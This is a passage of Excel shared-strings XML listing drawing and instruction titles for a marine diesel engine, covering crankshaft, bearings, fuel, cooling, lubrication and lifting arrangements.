    <t>APPROBATION DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END CLEARANCE-CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF CR.SHAFT MATR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE,SPECIAL BORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAMETER CLEARANCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BRG. LEAD-BRONZE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BEARING TIN-ALU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>METAL-CROSSHEAD BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTENING SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF CONN. ROD BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIST.ROD SCRAPER RG, LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE RING F. PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD - REPAIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIM F. THRUST PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL-CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC.INST.PIST.CROWN L-GB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L-GB PISTON CROWN WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING GROOVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TEST TOOL PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE PNEUM.DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing oil control unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAWINGS OF PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PI SHOT-PEENING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER-ATOMIZER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TEST ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS NITRID.EAS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD INSTRUCT. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THROTTLE VALVE COMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REP.OF HOUSING F.ROL.GUID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLACING OF FUEL CAMS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT/DATASET F. MACH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tolerances for gearwheel drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT BEARING,COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING - ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTM.OF REVERSING MECH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF REVERSING MECH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSH.FRAME FORM+POS.TOL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR. "MOMENT KOMP"</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC SYS. INSTRUCT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIRS AND ALTERATIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IDLERS ASSEMBLY COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAM TOLERANCES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLES F.OIL MIST DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,PICK-UP BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCOS-EDS,HARDWARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sensor wiring guidelines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF INSTRUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIVERSE DELE(ER UDG?ET).</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIVERSE DELE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSPECTION GAUGE-P.BARREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTMENT OF FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL.DRAWING F.FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAN.CONSOLE,CONVERSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CODE FOR RELAYS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PILOT LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERSPEED CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS.OF OVERSPEED RELAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DESCRIPTION OF RELAY BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PART FOR IMO PUMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM-START AND STOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POSITION TRANSMITTER ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM SLOW-TURNING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTR.EQUIPM.F.FUEL PUMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOCKDIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REQUIREM. SPEC.CYL.CUTOUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNATTENDED MACH. SPACES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY SYSTEM REQUIREMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTM.+DESC.OF ELEC.VIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC.OF UIT SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE CONTR.REIREMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOAD CONTROL REQUIREMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC., CPP CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC.OF LOAD CH.DEP.LUB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC.OF AVM ALARM/SL.DOWN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BYPASS SYSTEM, EL.DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL. DIAGRAM - PMI SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM-INTERMITT.LUBRIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRG.MONITORING, SLOW DOWN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLE FOR TEMP.SENS.,COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLES F.POS.PINS,FLYWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLES FOR MIP EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.GOVERNOR SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF GOVENOR BOOSTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGR.OF CONTR.AIR F. NOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DENOX CONTROL SPEC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF MASTER VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF FUEL PUMP TRANSM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE PLAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTIONS-MAN.SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DESCRIPTION OF MAN.SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEXT SHEET-ARR.SWITCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEQUENCE DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TELEGRAPH ORDERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTM.OF REGUL.GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS SYST.- DUAL FUEL ENG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.PULL ROD CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOP TRIALS TCS/PTI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAPACITIES FOR PTU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEC. CAP. FOR TCS/PTI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEC. CAP. FOR PTO/PTI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.PIPE,POWER TURBINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TCS/PTI OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO/PTI OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO/GCR OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CONNECTIONS FOR RCF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAX.FORCES ON PTU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POWER TURBINE OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIKRO SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING JOINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUN.OF COUNTERWEIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE AIR PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOISE ABATEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL. DRAWING FOR TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.1+8</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULSE CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST SYST. INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. PIPES-BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRILLING PLAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALANCING ARR.-FORE+AFT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSH.FORE,STATIC LOADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Min. no. of fitted bolt/stud</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF DISENGAGING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FLYWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL.DRAW.F.FUEL.O.FILT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLINE-LUB.OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS F.GLACIER F.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL.DRAW.F.LUB.O.FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR LUB. OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF LUB.OIL COOLERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TEST INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CORE Y56F</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GENERATOR+WRONG-WAY ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WRONG-WAY ALARM SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM FOR W.WAY ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF IMO-PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PART FOR LUB.O.PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F.O. SERVICE SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.T. COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGR.ARR.FUEL GAS &amp; OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECH.DATA,TURBOCH./BYPASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECH.DATA,TURBOCHARG./TCS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECH.DATA,TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCH.OTHER THAN B+W</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUXILIARY BLOWER CAPACITY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VTA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEXT:AUX. BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHEM.CLEAN.&amp;BOIL.OUT.A.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEXT: TC REP.+BLOCKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEXT: AIR COOLER REP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEXT: AIR COOLER CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEXT: AUX.BLOWER SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting tool, Aux.blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR PLATFORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.LOWER MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UPPER GALLERY OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOWER GALLERY OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACK. ARR. FOR RENK GEN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.-CENTRE REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUAL TEE COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLOTTED HEADLESS SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING-ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FUEL O. CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK TUNING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VAR.PIPES-MAN.+REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine cable connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE PIPE CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCALED ENGINE OUTLINES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE FUEL OIL OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALTERATION OF F.O.SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL HP PIPE BEND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPE - OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sleeve, divided</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SYSTEM,LIGHT OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SYSTEM,DIESEL O.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL SYST.H.F.O.MAIN+AUX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>M.E. INTERNAL F.O. SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGR.ARR.-FUEL OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL DRAIN SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-C.GALL.MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL DISTRIBUTOR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LUB.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT LUB.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-SCAV. AIR REC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain for cylinder cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIRSPACE-DRAIN PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENT.PIPE T.C.OIL OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SPRAY PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET DISTRIBUTOR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>START AIR PIPE-DISTRIB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER CLEANING TC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGR.ARR.-START.AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES REAR-SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUNDRY PIPES-FRONT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FW COOLING PIPES BBC TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESH COOL. WATER PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER PIPE BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR-COOL.CLEAN.PIPES,1 TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR-COOL.CLEAN.PIPES,2 TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAN TC CLEAN.PIPES(WATER)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TC CLEAN.PIPE(DRY CLEAN.)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING PIPE-T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-FRAME REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE - AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW COOLING PIPES, 2 TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER COOLING SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRAL COOLING HOT SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.WATER SYSTEM DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.SYST.SW.MAIN+AUX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.SYST.FW.MAIN+AUX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER SYST.PREHEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRAL COOL.W.,MAIN+AUX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURISED COOLING SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRAL COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W. INLET AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.OUTLET LUB.O.COOL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW. OUTLET FROM GENERATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F.W.OUTLET COLLECT. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F.W. OUTL.CH.AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL. W. OUTLET COLL.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE COOLING WATER MODULE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL SYSTEM PURIFIER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL SYST.FILTER CLEAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL SYSTEM DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T.C. LUB OIL SYS. DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub.oil system, header tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN SYSTEM STUFF.B.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.LUB/COOL OIL DISTRIB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL SYST.MAIN+AUX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LUB.OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFFING BOX DRAIN SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR. CONTROL OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil cleanliness spec.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas pipe system for GI-engines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EMISSION MEAS. PROCEDURES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inert gas syst. f. GI-engines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas supply syst. f. GI-engines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ventilation of dbl. wall pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-TOP SECTION FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-TOP SECTION CENTRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-TOP SECTION AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF FRAME COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF FRAME FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF FRAME AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.BEDPL.EX.CRKSH.FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-BEDPL.+CRKSH.COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-BEDPL.+CRANKSH.FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-BEDPL.+CRANKSH.AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF RECEIVER COMPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF RECEIVER FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.OF RECEIVER CENTRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
